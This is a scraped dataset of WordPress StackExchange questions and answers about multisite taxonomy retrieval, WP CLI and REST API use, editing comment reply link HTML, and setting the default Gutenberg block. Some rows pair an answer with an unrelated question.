| series | Series | | post | | | 1 |
+----------------+------------------+-------------+---------------+---------------+--------------+--------+
```
I can also pass `--format=json` or `--format=csv` to get a machine parseable result.
I can target individual sites in a multisite install by passing the `--url` parameter
e.g.
```
wp taxonomy list --url="https://example.com/" --format="json"
```
I can then call this from PHP and parse the result to get a list of taxonomies.
The same is true of terms, e.g. listing
```
❯ wp term list category
+---------+------------------+-----------------+-----------------------+-------------+--------+-------+
| term_id | term_taxonomy_id | name | slug | description | parent | count |
+---------+------------------+-----------------+-----------------------+-------------+--------+-------+
| 129 | 136 | Auto-Aggregated | auto-aggregated | | 0 | 1 |
| 245 | 276 | Big WP | big-wp | | 4 | 0 |
| 95 | 100 | CSS | css | | 7 | 1 |
| 7 | 7 | Design | design | | 0 | 3 |
| 30 | 32 | Development | development | | 17 | 31 |
...
```
Or a posts categories:
```
❯ wp post term list 15 category --format=csv
term_id,name,slug,taxonomy
5,WordCamp,wordcamp,category
```
Be sure to set the right working path, and the `wp` is installed available and executable.
Also be careful, if you ask WP CLI for every post in the database, it will give you it, even if it takes 1 hour to run. Your request will have ran out of time long before then leading to an error. So don't always provide an upper bounds on how many posts you want, even if you don't expect to reach it. It's also possible to request more data than the server has memory to hold, WP CLI will crash with an out of memory error in those situations. E.g. importing a 5GB wxr import file, or requesting 10k posts.
*However, if WP CLI isn't available...*
### REST API
You can query for taxonomies with the REST API. Every site supports it, but there are 2 caveats:
* HTTP requests are expensive, and you can't bypass this cost with a PHP function as you need to load WP from scratch to get the registered taxonomies and post types you desired
* Private and hidden taxonomies won't be shown, some taxonomies will only show with authentication, requiring you to add an authentication plugin
But if that's okay with you, you can use the built in discovery to discover post types and taxonomies.
Visit `example.com/wp-json/wp/v2/taxonomies` and you'll get a JSON list of public taxonomies, each object in the list has a `types` subfield that lists the post types it applies to.
You can also fetch a post this way via the `/wp/v2/posts` endpoint, but you'll get term IDs rather than term names back, likely requiring additional queries.
### Custom Endpoint
You can try to sidestep the restrictions above by building a custom endpoint. This would allow you to return everything you needed using a single request.
To do this, call `register_rest_route` to register an endpoint, and return an array of keys and values from the callback. The API will encode these as JSON
### Pushing The Data
Rather than retrieving this information from other sites in a multisite installation, it's much more efficient to have those sites push the information to you then caching the result. This is the most performant method.
### Uniform taxonomies, but with different visibility
Some sites can take advantage of this particular possibility. If all sites have the same taxonomies registered then you can query all terms by switching blogs regardless of sites. ***But nobody said the taxonomies need to have the same options***
For example, site A has a category taxonomy, and site B has a tags taxonomy. A does not use tags, and b does not use categories. So we register both taxonomies on both sites, but on A we make tags a hidden private taxonomy, and on B we make categories a hidden private taxonomy.
This work around won't be suitable for all situations though, and can't account for taxonomies registered by 3rd party plugins
### Preparing data in advance
We don't know the other sites registered taxonomies and terms for each post because we didn't load that sites code. However, that site does. So why not make the site store this information somewhere it can be retrieved?
For example, a site could store an option containing the registered taxonomies and their attributes.
The same could be done for a posts terms, a post meta field can be updated on the save hook to contain a list of terms with their names, URLs, and the taxonomy they belong to, so that a term list can be recreated elsewhere without needing to know the registered taxonomies. |
375,363 | <p>I have a WordPress site installed locally on my computer. The project was almost finished. Today I turned on my computer but it no longer works (categorically refusing to turn on), the repairman told me it's hard drive problem but I managed to get the project files which was in this hard drive thanks to a file recovery box (I recovered the WordPress files which were in www).</p>
<p>Before that, I had made a backup of the project in Dropbox via the UpdraftPlus plugin.</p>
<p>Now I bought a new computer and would like to know if there is a way to get my project back and how.</p>
<p>I count on you if not I will lose two months of work. Thank you in advance for your answers.</p>
| [
{
"answer_id": 375278,
"author": "Tom J Nowell",
"author_id": 736,
"author_profile": "https://wordpress.stackexchange.com/users/736",
"pm_score": 2,
"selected": false,
"text": "<blockquote>\n<p>how can I retrieve all taxonomy terms for a post in an arbitrary site programmatically? In other words, given post $post and site $siteId, how can I retrieve all terms for all taxonomies of that post in that site?</p>\n</blockquote>\n<p>You can do this by omitting the taxonomy from <code>WP_Term_Query</code>:</p>\n<pre class=\"lang-php prettyprint-override\"><code>$query = new WP_Term_Query( [\n 'object_ids' => [ $post_id ]\n] );\n$terms = $query->get_terms();\n</code></pre>\n<p>Note that this gives you no information that the taxonomys of those terms were registered with, so permalinks and labels may not be available</p>\n<blockquote>\n<p>How can I retrieve all taxonomies of an arbitrary site? In other words, given that I have a site $siteId, how can I retrieve all taxonomies on that site?</p>\n</blockquote>\n<p><strong>Unfortunately, no, there is no API or function call in PHP that will give you this information.</strong></p>\n<p>Generally needing this information is a sign that something has gone wrong at the high level architecture, and that simpler easier solutions exist. Every decision has trade offs and built in constraints, and this is one of those situations where breaching a constraint requires a tradeoff or an architectural change.</p>\n<p>The root problem is that <code>switch_to_blog</code> changes the tables and globals, but it doesn't load any code from the other blog being switched to, so we need to recover what the registered posts types and taxonomies are from that site.</p>\n<h2>Work Arounds</h2>\n<p>However, there are work arounds, which one is best for you will depend on several things, and each has their own advantages and disadvantages.</p>\n<ol>\n<li>Retrieving all terms and inspecting their taxonomy field</li>\n<li>WP CLI</li>\n<li>REST API</li>\n<li>Dedicated REST API endpoints</li>\n<li>Pushing Data</li>\n<li>Uniform taxonomies, but with different visibility</li>\n<li>Preparing data in advance</li>\n</ol>\n<p>These are all work arounds that try to cater for the edge case you've asked about.</p>\n<p>Of all of these, only WP CLI reliably gives all the needed information without performance and scaling issues. Whichever method is used, cache the result.</p>\n<h3>Retrieving all Terms</h3>\n<p>We can retrieve all terms in a site, then loop over them to identify the <code>taxonomy</code> fields:</p>\n<pre class=\"lang-php prettyprint-override\"><code>$query = new WP_Term_Query([]);\n$terms = $query->get_terms();\n$taxonomies = wp_list_pluck( $terms, 'taxonomy' );\n$taxonomies = array_unique( $taxonomies );\n</code></pre>\n<p>However, there are some major problems with this:</p>\n<ul>\n<li>it does not scale, pulling all terms into memory takes time and memory, eventually the site will have more than can be held leading either to hitting the execution time limit, or memory exhaustion</li>\n<li>it only shows used taxonomies, if there are no categories then the category taxonomy will not show</li>\n<li>this gives you no information that the taxonomy of those terms were registered with, so permalinks and labels may not be available</li>\n</ul>\n<h3>WP CLI</h3>\n<p>WP CLI can give you exactly what you need for both of your questions, <em>if it's available</em>. By assembling a command and calling it from PHP, you can programmatically retrieve the data you wish while avoiding a HTTP request.</p>\n<ul>\n<li>we call WP CLI via either <code>exec</code> or <code>proc_open</code></li>\n<li>we specify which site we want via the <code>--url</code> parameter, we can get the URL via a standard API call such as <code>get_site_url( $site_id )</code></li>\n<li>We add the <code>--format</code> parameter to ensure WP CLI gives us machine readable results, either <code>--format="csv"</code> for a CSV string that functions such as <code>fgetcsv</code> etc can process, or <code>--format="json"</code> which <code>json_decode</code> can process. JSON will be easier</li>\n<li>we parse the result in PHP</li>\n</ul>\n<p>For example, here is the local copy of my site:</p>\n<pre><code>vagrant@vvv:/srv/www/tomjn/public_html$ wp taxonomy list\n+----------------+------------------+-------------+---------------+---------------+--------------+--------+\n| name | label | description | object_type | show_tagcloud | hierarchical | public |\n+----------------+------------------+-------------+---------------+---------------+--------------+--------+\n| category | Categories | | post | 1 | 1 | 1 |\n| post_tag | Tags | | post | 1 | | 1 |\n| nav_menu | Navigation Menus | | nav_menu_item | | | |\n| link_category | Link Categories | | link | 1 | | |\n| post_format | Formats | | post | | | 1 |\n| technology | Technologies | | project | 1 | | 1 |\n| tomjn_talk_tag | Talk Tags | | tomjn_talks | 1 | | 1 |\n| series | Series | | post | | | 1 |\n+----------------+------------------+-------------+---------------+---------------+--------------+--------+\n</code></pre>\n<p>I can also pass <code>--format=json</code> or <code>--format=csv</code> to get a machine parseable result.</p>\n<p>I can target individual sites in a multisite install by passing the <code>--url</code> parameter</p>\n<p>e.g.</p>\n<pre><code>wp taxonomy list --url="https://example.com/" --format="json"\n</code></pre>\n<p>I can then call this from PHP and parse the result to get a list of taxonomies.</p>\n<p>The same is true of terms, e.g. listing</p>\n<pre><code>❯ wp term list category\n+---------+------------------+-----------------+-----------------------+-------------+--------+-------+\n| term_id | term_taxonomy_id | name | slug | description | parent | count |\n+---------+------------------+-----------------+-----------------------+-------------+--------+-------+\n| 129 | 136 | Auto-Aggregated | auto-aggregated | | 0 | 1 |\n| 245 | 276 | Big WP | big-wp | | 4 | 0 |\n| 95 | 100 | CSS | css | | 7 | 1 |\n| 7 | 7 | Design | design | | 0 | 3 |\n| 30 | 32 | Development | development | | 17 | 31 |\n...\n</code></pre>\n<p>Or a posts categories:</p>\n<pre><code>❯ wp post term list 15 category --format=csv\nterm_id,name,slug,taxonomy\n5,WordCamp,wordcamp,category\n</code></pre>\n<p>Be sure to set the right working path, and the <code>wp</code> is installed available and executable.</p>\n<p>Also be careful, if you ask WP CLI for every post in the database, it will give you it, even if it takes 1 hour to run. Your request will have ran out of time long before then leading to an error. So don't always provide an upper bounds on how many posts you want, even if you don't expect to reach it. It's also possible to request more data than the server has memory to hold, WP CLI will crash with an out of memory error in those situations. E.g. importing a 5GB wxr import file, or requesting 10k posts.</p>\n<p><em>However, if WP CLI isn't available...</em></p>\n<h3>REST API</h3>\n<p>You can query for taxonomies with the REST API. Every site supports it, but there are 2 caveats:</p>\n<ul>\n<li>HTTP requests are expensive, and you can't bypass this cost with a PHP function as you need to load WP from scratch to get the registered taxonomies and post types you desired</li>\n<li>Private and hidden taxonomies won't be shown, some taxonomies will only show with authentication, requiring you to add an authentication plugin</li>\n</ul>\n<p>But if that's okay with you, you can use the built in discovery to discover post types and taxonomies.</p>\n<p>Visit <code>example.com/wp-json/wp/v2/taxonomies</code> and you'll get a JSON list of public taxonomies, each object in the list has a <code>types</code> subfield that lists the post types it applies to.</p>\n<p>You can also fetch a post this way via the <code>/wp/v2/posts</code> endpoint, but you'll get term IDs rather than term names back, likely requiring additional queries.</p>\n<h3>Custom Endpoint</h3>\n<p>You can try to sidestep the restrictions above by building a custom endpoint. This would allow you to return everything you needed using a single request.</p>\n<p>To do this, call <code>register_rest_route</code> to register an endpoint, and return an array of keys and values from the callback. The API will encode these as JSON</p>\n<h3>Pushing The Data</h3>\n<p>Rather than retrieving this information from other sites in a multisite installation, it's much more efficient to have those sites push the information to you then caching the result. This is the most performant method.</p>\n<h3>Uniform taxonomies, but with different visibility</h3>\n<p>Some sites can take advantage of this particular possibility. If all sites have the same taxonomies registered then you can query all terms by switching blogs regardless of sites. <em><strong>But nobody said the taxonomies need to have the same options</strong></em></p>\n<p>For example, site A has a category taxonomy, and site B has a tags taxonomy. A does not use tags, and b does not use categories. So we register both taxonomies on both sites, but on A we make tags a hidden private taxonomy, and on B we make categories a hidden private taxonomy.</p>\n<p>This work around won't be suitable for all situations though, and can't account for taxonomies registered by 3rd party plugins</p>\n<h3>Preparing data in advance</h3>\n<p>We don't know the other sites registered taxonomies and terms for each post because we didn't load that sites code. However, that site does. So why not make the site store this information somewhere it can be retrieved?</p>\n<p>For example, a site could store an option containing the registered taxonomies and their attributes.</p>\n<p>The same could be done for a posts terms, a post meta field can be updated on the save hook to contain a list of terms with their names, URLs, and the taxonomy they belong to, so that a term list can be recreated elsewhere without needing to know the registered taxonomies.</p>\n"
},
{
"answer_id": 375381,
"author": "XedinUnknown",
"author_id": 64825,
"author_profile": "https://wordpress.stackexchange.com/users/64825",
"pm_score": 0,
"selected": false,
"text": "<p>Use <a href=\"https://developer.wordpress.org/reference/classes/WP_Term_Query/__construct/\" rel=\"nofollow noreferrer\"><code>WP_Term_Query</code></a> without the <code>taxonomy</code> parameter. While <a href=\"https://developer.wordpress.org/reference/functions/wp_get_object_terms/\" rel=\"nofollow noreferrer\"><code>wp_get_object_terms()</code></a> strangely doesn't allow omitting the <code>taxonomy</code> parameter, <code>WP_Term_Query</code> that is used under the hood does.</p>\n<pre class=\"lang-php prettyprint-override\"><code>function getPostTerms(int $postId, int $siteId): array\n{\n switch_to_blog($siteId);\n\n $postId = 123;\n $query = new WP_Term_Query(['object_ids' => [$postId]]);\n $terms = $query->get_terms();\n\n restore_current_blog();\n\n /* @var $terms WP_Term[] */\n return $terms;\n}\n</code></pre>\n<p>This returns all terms for post #123. <strong>Caveat</strong>: only terms that are <em>associated</em> with at least one post seem to be returned.</p>\n<p>From here, it should be possible to iterate over the terms, and get their taxonomy, if the goal is to list all taxonomies:</p>\n<pre class=\"lang-php prettyprint-override\"><code>function getAllTaxonomies(int $siteId): array\n{\n switch_to_blog($siteId);\n\n $query = new WP_Term_Query([]);\n $terms = $query->get_terms();\n\n $taxonomies = [];\n foreach ($terms as $term) {\n assert($term instanceof WP_Term);\n $taxonomy = $term->taxonomy;\n $taxonomies[$taxonomy] = true;\n }\n\n restore_current_blog();\n\n $taxonomies = array_keys($taxonomies);\n return $taxonomies;\n}\n\n</code></pre>\n<p>This allows retrieving all taxonomy slugs for a specific site. <strong>Caveat</strong>: it only appears to return taxonomies which have at least 1 post associated with at least 1 term. This is not the most performant way because it would loop through all of the terms, but there aren't usually more than a dozen terms for a taxonomy, so it should be fine in most cases.</p>\n<h2>Limitations</h2>\n<ol>\n<li>Cannot get terms that have no posts associated with them. Consequently, cannot get taxonomy slugs for which there are no terms associated with at least 1 post.</li>\n<li>Cannot retrieve <a href=\"https://developer.wordpress.org/reference/classes/wp_taxonomy/\" rel=\"nofollow noreferrer\"><code>WP_Taxonomy</code></a> objects for an arbitrary site, because taxonomies from plugins that are not running in the current site are not guaranteed to be registered at all.</li>\n</ol>\n"
}
] | 2020/09/24 | [
"https://wordpress.stackexchange.com/questions/375363",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/195106/"
] | I have a WordPress site installed locally on my computer. The project was almost finished. Today I turned on my computer but it no longer works (categorically refusing to turn on), the repairman told me it's hard drive problem but I managed to get the project files which was in this hard drive thanks to a file recovery box (I recovered the WordPress files which were in www).
Before that, I had made a backup of the project in Dropbox via the UpdraftPlus plugin.
Now I bought a new computer and would like to know if there is a way to get my project back and how.
I count on you if not I will lose two months of work. Thank you in advance for your answers. | >
> how can I retrieve all taxonomy terms for a post in an arbitrary site programmatically? In other words, given post $post and site $siteId, how can I retrieve all terms for all taxonomies of that post in that site?
>
>
>
You can do this by omitting the taxonomy from `WP_Term_Query`:
```php
$query = new WP_Term_Query( [
'object_ids' => [ $post_id ]
] );
$terms = $query->get_terms();
```
Note that this gives you no information that the taxonomys of those terms were registered with, so permalinks and labels may not be available
>
> How can I retrieve all taxonomies of an arbitrary site? In other words, given that I have a site $siteId, how can I retrieve all taxonomies on that site?
>
>
>
**Unfortunately, no, there is no API or function call in PHP that will give you this information.**
Generally needing this information is a sign that something has gone wrong at the high level architecture, and that simpler easier solutions exist. Every decision has trade offs and built in constraints, and this is one of those situations where breaching a constraint requires a tradeoff or an architectural change.
The root problem is that `switch_to_blog` changes the tables and globals, but it doesn't load any code from the other blog being switched to, so we need to recover what the registered posts types and taxonomies are from that site.
Work Arounds
------------
However, there are work arounds, which one is best for you will depend on several things, and each has their own advantages and disadvantages.
1. Retrieving all terms and inspecting their taxonomy field
2. WP CLI
3. REST API
4. Dedicated REST API endpoints
5. Pushing Data
6. Uniform taxonomies, but with different visibility
7. Preparing data in advance
These are all work arounds that try to cater for the edge case you've asked about.
Of all of these, only WP CLI reliably gives all the needed information without performance and scaling issues. Whichever method is used, cache the result.
### Retrieving all Terms
We can retrieve all terms in a site, then loop over them to identify the `taxonomy` fields:
```php
$query = new WP_Term_Query([]);
$terms = $query->get_terms();
$taxonomies = wp_list_pluck( $terms, 'taxonomy' );
$taxonomies = array_unique( $taxonomies );
```
However, there are some major problems with this:
* it does not scale, pulling all terms into memory takes time and memory, eventually the site will have more than can be held leading either to hitting the execution time limit, or memory exhaustion
* it only shows used taxonomies, if there are no categories then the category taxonomy will not show
* this gives you no information that the taxonomy of those terms were registered with, so permalinks and labels may not be available
### WP CLI
WP CLI can give you exactly what you need for both of your questions, *if it's available*. By assembling a command and calling it from PHP, you can programmatically retrieve the data you wish while avoiding a HTTP request.
* we call WP CLI via either `exec` or `proc_open`
* we specify which site we want via the `--url` parameter, we can get the URL via a standard API call such as `get_site_url( $site_id )`
* We add the `--format` parameter to ensure WP CLI gives us machine readable results, either `--format="csv"` for a CSV string that functions such as `fgetcsv` etc can process, or `--format="json"` which `json_decode` can process. JSON will be easier
* we parse the result in PHP
For example, here is the local copy of my site:
```
vagrant@vvv:/srv/www/tomjn/public_html$ wp taxonomy list
+----------------+------------------+-------------+---------------+---------------+--------------+--------+
| name | label | description | object_type | show_tagcloud | hierarchical | public |
+----------------+------------------+-------------+---------------+---------------+--------------+--------+
| category | Categories | | post | 1 | 1 | 1 |
| post_tag | Tags | | post | 1 | | 1 |
| nav_menu | Navigation Menus | | nav_menu_item | | | |
| link_category | Link Categories | | link | 1 | | |
| post_format | Formats | | post | | | 1 |
| technology | Technologies | | project | 1 | | 1 |
| tomjn_talk_tag | Talk Tags | | tomjn_talks | 1 | | 1 |
| series | Series | | post | | | 1 |
+----------------+------------------+-------------+---------------+---------------+--------------+--------+
```
I can also pass `--format=json` or `--format=csv` to get a machine parseable result.
I can target individual sites in a multisite install by passing the `--url` parameter
e.g.
```
wp taxonomy list --url="https://example.com/" --format="json"
```
I can then call this from PHP and parse the result to get a list of taxonomies.
The same is true of terms, e.g. listing
```
❯ wp term list category
+---------+------------------+-----------------+-----------------------+-------------+--------+-------+
| term_id | term_taxonomy_id | name | slug | description | parent | count |
+---------+------------------+-----------------+-----------------------+-------------+--------+-------+
| 129 | 136 | Auto-Aggregated | auto-aggregated | | 0 | 1 |
| 245 | 276 | Big WP | big-wp | | 4 | 0 |
| 95 | 100 | CSS | css | | 7 | 1 |
| 7 | 7 | Design | design | | 0 | 3 |
| 30 | 32 | Development | development | | 17 | 31 |
...
```
Or a posts categories:
```
❯ wp post term list 15 category --format=csv
term_id,name,slug,taxonomy
5,WordCamp,wordcamp,category
```
Be sure to set the right working path, and the `wp` is installed available and executable.
Also be careful, if you ask WP CLI for every post in the database, it will give you it, even if it takes 1 hour to run. Your request will have ran out of time long before then leading to an error. So don't always provide an upper bounds on how many posts you want, even if you don't expect to reach it. It's also possible to request more data than the server has memory to hold, WP CLI will crash with an out of memory error in those situations. E.g. importing a 5GB wxr import file, or requesting 10k posts.
*However, if WP CLI isn't available...*
### REST API
You can query for taxonomies with the REST API. Every site supports it, but there are 2 caveats:
* HTTP requests are expensive, and you can't bypass this cost with a PHP function as you need to load WP from scratch to get the registered taxonomies and post types you desired
* Private and hidden taxonomies won't be shown, some taxonomies will only show with authentication, requiring you to add an authentication plugin
But if that's okay with you, you can use the built in discovery to discover post types and taxonomies.
Visit `example.com/wp-json/wp/v2/taxonomies` and you'll get a JSON list of public taxonomies, each object in the list has a `types` subfield that lists the post types it applies to.
You can also fetch a post this way via the `/wp/v2/posts` endpoint, but you'll get term IDs rather than term names back, likely requiring additional queries.
### Custom Endpoint
You can try to sidestep the restrictions above by building a custom endpoint. This would allow you to return everything you needed using a single request.
To do this, call `register_rest_route` to register an endpoint, and return an array of keys and values from the callback. The API will encode these as JSON
### Pushing The Data
Rather than retrieving this information from other sites in a multisite installation, it's much more efficient to have those sites push the information to you then caching the result. This is the most performant method.
### Uniform taxonomies, but with different visibility
Some sites can take advantage of this particular possibility. If all sites have the same taxonomies registered then you can query all terms by switching blogs regardless of sites. ***But nobody said the taxonomies need to have the same options***
For example, site A has a category taxonomy, and site B has a tags taxonomy. A does not use tags, and b does not use categories. So we register both taxonomies on both sites, but on A we make tags a hidden private taxonomy, and on B we make categories a hidden private taxonomy.
This work around won't be suitable for all situations though, and can't account for taxonomies registered by 3rd party plugins
### Preparing data in advance
We don't know the other sites registered taxonomies and terms for each post because we didn't load that sites code. However, that site does. So why not make the site store this information somewhere it can be retrieved?
For example, a site could store an option containing the registered taxonomies and their attributes.
The same could be done for a posts terms, a post meta field can be updated on the save hook to contain a list of terms with their names, URLs, and the taxonomy they belong to, so that a term list can be recreated elsewhere without needing to know the registered taxonomies. |
375,439 | <p>Hello I want to know how to edit wordpress html and add custom html
for example I want to add html element like icon beside a link. here is the code:</p>
<p>wordpress original source code:</p>
<pre><code><a rel="nofollow" class="comment-reply-link"> Reply </a>
</code></pre>
<p>I want to edit this wordpress html code to add this icon to be:</p>
<pre><code><a rel="nofollow" class="comment-reply-link">
<i class="material-icons"> Reply </i>
</a>
</code></pre>
<p>UPDATE:
another example to be clear:
I want to add custom id to the link
which is wordpress blog comment element source code not a theme source code.
please, how to do that?
and many thanks in advance</p>
| [
{
"answer_id": 375442,
"author": "Patrice Poliquin",
"author_id": 32365,
"author_profile": "https://wordpress.stackexchange.com/users/32365",
"pm_score": 0,
"selected": false,
"text": "<p><strong>TL:DR;</strong></p>\n<p>Quick answer would be that you can't add text to a custom icon library html tag. Here is how it should be formatted.</p>\n<p>Based on the documentation from Material Icons, you would need to have something like this :</p>\n<pre><code><a rel="nofollow" class="comment-reply-link">\n<span class="material-icons">reply</span> Reply \n</a>\n</code></pre>\n<p>Documentation : <a href=\"http://google.github.io/material-design-icons/#using-the-icons-in-html\" rel=\"nofollow noreferrer\">http://google.github.io/material-design-icons/#using-the-icons-in-html</a></p>\n<p><strong>Long answer</strong></p>\n<p>You can use custom icon library like <code>Material Icons</code> or <code>Font Awesome</code>.</p>\n<p>Let's assume you want to use Font Awesome.</p>\n<p>Go to <a href=\"https://fontawesome.com/start\" rel=\"nofollow noreferrer\">https://fontawesome.com/start</a> to start creating a self-hosted icon kit. You might need to create a free account before creating the kit.</p>\n<p><a href=\"https://i.stack.imgur.com/rp4kE.png\" rel=\"nofollow noreferrer\"><img src=\"https://i.stack.imgur.com/rp4kE.png\" alt=\"Start a New Project with a Kit\" /></a></p>\n<p>Just give the name of your project and click on Create & Use This Kit.</p>\n<p>Once you have create your kit, you will have a kit link that looks like this :</p>\n<p><code><script src="https://kit.fontawesome.com/XXXXXXXXX.js" crossorigin="anonymous"></script></code></p>\n<p>Copy this code and head over your <code>header.php</code> file in your WordPress project.</p>\n<p>Once you are in, go in the <code><head></code> section and paste your code into it.</p>\n<pre><code><!doctype html>\n<html <?php language_attributes(); ?>>\n\n<head>\n <meta charset="<?php bloginfo( 'charset' ); ?>" />\n <meta name="viewport" content="width=device-width, initial-scale=1" />\n <link rel="profile" href="https://gmpg.org/xfn/11" />\n <?php wp_head(); ?>\n\n <script src="https://kit.fontawesome.com/XXXXXXXXX.js" crossorigin="anonymous"></script>\n\n</head>\n\n<body>\n ...\n</code></pre>\n<p>Note : It is recommended to use <code>wp_enqueue_script()</code> function. You can find the documentation on the WordPress Codex : <a href=\"https://developer.wordpress.org/reference/functions/wp_enqueue_script/\" rel=\"nofollow noreferrer\">https://developer.wordpress.org/reference/functions/wp_enqueue_script/</a></p>\n<p>You can save your file and now go into your template file where you want to edit your HTML.</p>\n<p>You can browse the Font Awesome Free icons and find an icon that fits your need : <a href=\"https://fontawesome.com/icons?d=gallery&m=free\" rel=\"nofollow noreferrer\">https://fontawesome.com/icons?d=gallery&m=free</a></p>\n<p>Once you have your icon, simply copy-paste the html tag into your WordPress template file.</p>\n<p><a href=\"https://i.stack.imgur.com/1Nmjo.png\" rel=\"nofollow noreferrer\"><img src=\"https://i.stack.imgur.com/1Nmjo.png\" alt=\"fas fa-reply\" /></a></p>\n<pre><code><a rel="nofollow" class="comment-reply-link">\n<i class="fas fa-reply fa-flip-horizontal"></i> Reply\n</a>\n</code></pre>\n<p>When reloading your page, you will be able to see the icon.</p>\n"
},
{
"answer_id": 375444,
"author": "Tom J Nowell",
"author_id": 736,
"author_profile": "https://wordpress.stackexchange.com/users/736",
"pm_score": 2,
"selected": true,
"text": "<p>That HTML is generated in the <code>get_comment_reply_link</code> function:</p>\n<p><a href=\"https://github.com/WordPress/WordPress/blob/0418dad234c13a88e06f5e50c83bcebaaf5ab211/wp-includes/comment-template.php#L1654\" rel=\"nofollow noreferrer\">https://github.com/WordPress/WordPress/blob/0418dad234c13a88e06f5e50c83bcebaaf5ab211/wp-includes/comment-template.php#L1654</a></p>\n<p>Which gives us what's needed. Here are 3 options:</p>\n<ol>\n<li>The function takes an arguments array, and <code>reply_text</code> is one of the options, so just set this value to what you wanted e.g. <code>'reply_text' => '<i class="material-icons"> Reply </i>'</code></li>\n<li>There's a filter at the end of the function that gives you the opportunity to modify the entire links HTML named <code>comment_reply_link</code>, look up the docs for that filter for details</li>\n<li>You don't need to modify the HTML markup at all, this can be done with CSS</li>\n</ol>\n<p>Changing the call to <code>get_comment_reply_link</code> will require changes to your theme, possibly the creation of a comments template. You will need to adjust <code>wp_list_comments</code> to take a <code>callback</code> argument with a function to display the comment, allowing you to change its HTML</p>\n<p>Using the filter can be done in a themes <code>functions.php</code> or in a plugin.</p>\n<p>Using CSS will require you to enquire with the material design library you've chosen.</p>\n"
}
] | 2020/09/25 | [
"https://wordpress.stackexchange.com/questions/375439",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/188733/"
] | Hello I want to know how to edit wordpress html and add custom html
for example I want to add html element like icon beside a link. here is the code:
wordpress original source code:
```
<a rel="nofollow" class="comment-reply-link"> Reply </a>
```
I want to edit this wordpress html code to add this icon to be:
```
<a rel="nofollow" class="comment-reply-link">
<i class="material-icons"> Reply </i>
</a>
```
UPDATE:
another example to be clear:
I want to add custom id to the link
which is wordpress blog comment element source code not a theme source code.
please, how to do that?
and many thanks in advance | That HTML is generated in the `get_comment_reply_link` function:
<https://github.com/WordPress/WordPress/blob/0418dad234c13a88e06f5e50c83bcebaaf5ab211/wp-includes/comment-template.php#L1654>
Which gives us what's needed. Here are 3 options:
1. The function takes an arguments array, and `reply_text` is one of the options, so just set this value to what you wanted e.g. `'reply_text' => '<i class="material-icons"> Reply </i>'`
2. There's a filter at the end of the function that gives you the opportunity to modify the entire links HTML named `comment_reply_link`, look up the docs for that filter for details
3. You don't need to modify the HTML markup at all, this can be done with CSS
Changing the call to `get_comment_reply_link` will require changes to your theme, possibly the creation of a comments template. You will need to adjust `wp_list_comments` to take a `callback` argument with a function to display the comment, allowing you to change its HTML
Using the filter can be done in a themes `functions.php` or in a plugin.
Using CSS will require you to enquire with the material design library you've chosen. |
375,454 | <p>When I open the block editor on a new post or page or edit an existing post or page, the Default Gutenberg Block is the paragraph block. How do I change this to a gallery block or another block?</p>
| [
{
"answer_id": 375618,
"author": "Will",
"author_id": 48698,
"author_profile": "https://wordpress.stackexchange.com/users/48698",
"pm_score": 0,
"selected": false,
"text": "<p>This is possible with the <a href=\"https://developer.wordpress.org/block-editor/packages/packages-blocks/#setDefaultBlockName\" rel=\"nofollow noreferrer\">setDefaultBlockName function</a> although it is poorly documented at the moment.</p>\n<p>You can try this out by placing this in the developers console of your web browser while you have the block editor open.</p>\n<pre><code>wp.domReady(() => {\n wp.blocks.setDefaultBlockName('core/quote');\n});\n</code></pre>\n<p><a href=\"https://github.com/WordPress/gutenberg/issues/15730#issuecomment-617853036\" rel=\"nofollow noreferrer\">(source)</a></p>\n<p>I would recommend that you create a custom plugin; and start with this (haven't tested, but should work).</p>\n<pre><code>function change_default_block {\nwp_register_script( 'js-change-default-block', plugin_dir_path( __FILE__ ) . '/js/change-default-block.js', '', '', true );\n}\n\nadd_action( 'wp_enqueue_scripts', 'change_default_block', 4 );\n</code></pre>\n"
},
{
"answer_id": 375653,
"author": "Tim",
"author_id": 113538,
"author_profile": "https://wordpress.stackexchange.com/users/113538",
"pm_score": 2,
"selected": true,
"text": "<p>You can use the Gutenberg Block Template it is used to have a content placeholder for your Gutenberg content.</p>\n<p><a href=\"https://developer.wordpress.org/block-editor/developers/block-api/block-templates/\" rel=\"nofollow noreferrer\">https://developer.wordpress.org/block-editor/developers/block-api/block-templates/</a></p>\n<pre><code><?php\nfunction myplugin_register_template() {\n $post_type_object = get_post_type_object( 'post' );\n $post_type_object->template = array(\n array( 'core/image' ),\n );\n}\nadd_action( 'init', 'myplugin_register_template' );\n</code></pre>\n"
}
] | 2020/09/25 | [
"https://wordpress.stackexchange.com/questions/375454",
"https://wordpress.stackexchange.com",
"https://wordpress.stackexchange.com/users/195187/"
] | When I open the block editor on a new post or page or edit an existing post or page, the Default Gutenberg Block is the paragraph block. How do I change this to a gallery block or another block? | You can use the Gutenberg Block Template it is used to have a content placeholder for your Gutenberg content.
<https://developer.wordpress.org/block-editor/developers/block-api/block-templates/>
```
<?php
function myplugin_register_template() {
$post_type_object = get_post_type_object( 'post' );
$post_type_object->template = array(
array( 'core/image' ),
);
}
add_action( 'init', 'myplugin_register_template' );
``` |
375,459 | <p>I have special roles on my site.
I use easy digital download.
My user has access to the download page. I want the metabox not to see the number of sales.
Can I hide this metabox for this role or user?</p>
<p>Of course, now that I had to, I deleted it with CSS (<code>display : none</code>)
Thank you in advance for your guidance.</p>
| [
{
"answer_id": 375618,
"author": "Will",
"author_id": 48698,
"author_profile": "https://wordpress.stackexchange.com/users/48698",
"pm_score": 0,
"selected": false,
"text": "<p>This is possible with the <a href=\"https://developer.wordpress.org/block-editor/packages/packages-blocks/#setDefaultBlockName\" rel=\"nofollow noreferrer\">setDefaultBlockName function</a> although it is poorly documented at the moment.</p>\n<p>You can try this out by placing this in the developers console of your web browser while you have the block editor open.</p>\n<pre><code>wp.domReady(() => {\n wp.blocks.setDefaultBlockName('core/quote');\n});\n</code></pre>\n<p><a href=\"https://github.com/WordPress/gutenberg/issues/15730#issuecomment-617853036\" rel=\"nofollow noreferrer\">(source)</a></p>\n<p>I would recommend that you create a custom plugin; and start with this (haven't tested, but should work).</p>\n<pre><code>function change_default_block {\nwp_register_script( 'js-change-default-block', plugin_dir_path( __FILE__ ) . '/js/change-default-block.js', '', '', true );\n}\n\nadd_action( 'wp_enqueue_scripts', 'change_default_block', 4 );\n</code></pre>\n"
},
{
"answer_id": 375653,
"author": "Tim",
"author_id": 113538,
"author_profile": "https://wordpress.stackexchange.com/users/113538",
"pm_score": 2,
